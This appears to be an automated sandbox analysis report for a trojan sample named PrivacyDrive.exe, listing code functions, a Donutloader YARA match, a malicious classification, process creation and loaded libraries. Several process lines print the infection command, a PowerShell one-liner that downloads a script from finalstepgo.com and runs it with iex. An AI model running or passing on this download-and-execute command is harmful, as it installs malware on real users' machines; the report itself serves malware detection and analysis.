Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051DE2A0	4_2_051DE2A0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D7D90	4_2_051D7D90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051CBC50	4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051C9F99	4_2_051C9F99
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051ACE00	4_2_051ACE00
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A7EB0	4_2_051A7EB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051D6970	4_2_051D6970
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051A3890	4_2_051A3890
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FCC583	8_2_00FCC583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7055F	8_2_00F7055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA80E2	8_2_00FA80E2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F831C2	8_2_00F831C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FBC2B2	8_2_00FBC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F75292	8_2_00F75292
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA8372	8_2_00FA8372
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FCD5C4	8_2_00FCD5C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F9D652	8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA9792	8_2_00FA9792
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F798B2	8_2_00F798B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7E802	8_2_00F7E802
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F9B99B	8_2_00F9B99B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7CAE2	8_2_00F7CAE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7DA82	8_2_00F7DA82
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FA9A42	8_2_00FA9A42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F73A08	8_2_00F73A08
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F90B95	8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72CB5	8_2_00F72CB5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FAFCA2	8_2_00FAFCA2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FB9DB2	8_2_00FB9DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72D5B	8_2_00F72D5B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F76EFD	8_2_00F76EFD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7BEE2	8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F76EB2	8_2_00F76EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F78EB2	8_2_00F78EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72E8E	8_2_00F72E8E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72E1A	8_2_00F72E1A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72FB3	8_2_00F72FB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7CF72	8_2_00F7CF72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011EF193	8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D2006	8_2_011D2006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01208040	8_2_01208040
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DC080	8_2_011DC080
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DB0E0	8_2_011DB0E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D1359	8_2_011D1359
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_012183B0	8_2_012183B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_0120E2A0	8_2_0120E2A0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D12B3	8_2_011D12B3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DB570	8_2_011DB570
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D15B1	8_2_011D15B1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D1418	8_2_011D1418
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D148C	8_2_011D148C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D54B0	8_2_011D54B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D74B0	8_2_011D74B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D54FB	8_2_011D54FB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DA4E0	8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011E17C0	8_2_011E17C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_012066E0	8_2_012066E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01206970	8_2_01206970
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D3890	8_2_011D3890
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_0121A8B0	8_2_0121A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01207D90	8_2_01207D90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011FBC50	8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011F9F99	8_2_011F9F99
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DCE00	8_2_011DCE00
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D7EB0	8_2_011D7EB0

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00424910 appears 45 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00418CF0 appears 92 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 004FFB7D appears 31 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F80862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 011DEE60 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00439540 appears 36 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 051ACBE0 appears 83 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F7E5E2 appears 89 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F8E5E2 appears 89 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0041F120 appears 65 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 011DCBE0 appears 93 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00406E50 appears 178 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 051AEE60 appears 122 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 004C24A0 appears 135 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0045EC80 appears 107 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0052CF10 appears 37 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00407150 appears 69 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0045EEC0 appears 42 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F90862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 004FFB4F appears 47 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00418AC0 appears 74 times

One or more processes crash

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760

Yara signature match

Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.win@13/30@4/3

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004030E0 PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,GetLastError,FormatMessageW,LocalFree,

4_2_004030E0

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004D3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,

4_2_004D3270

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0043E991 GetVolumeInformationW,GetDiskFreeSpaceExW,

4_2_0043E991

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError,		4_2_0041D320
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: CreateServiceW,ChangeServiceConfig2W,SetLastError,		4_2_0041CE80

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00F80C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,

4_2_00F80C6F

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_051DF006 CoCreateInstance,

4_2_051DF006

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004D3220 FindResourceW,SizeofResource,LoadResource,LockResource,

4_2_004D3220

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

4_2_0041D320

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2504
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess764

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
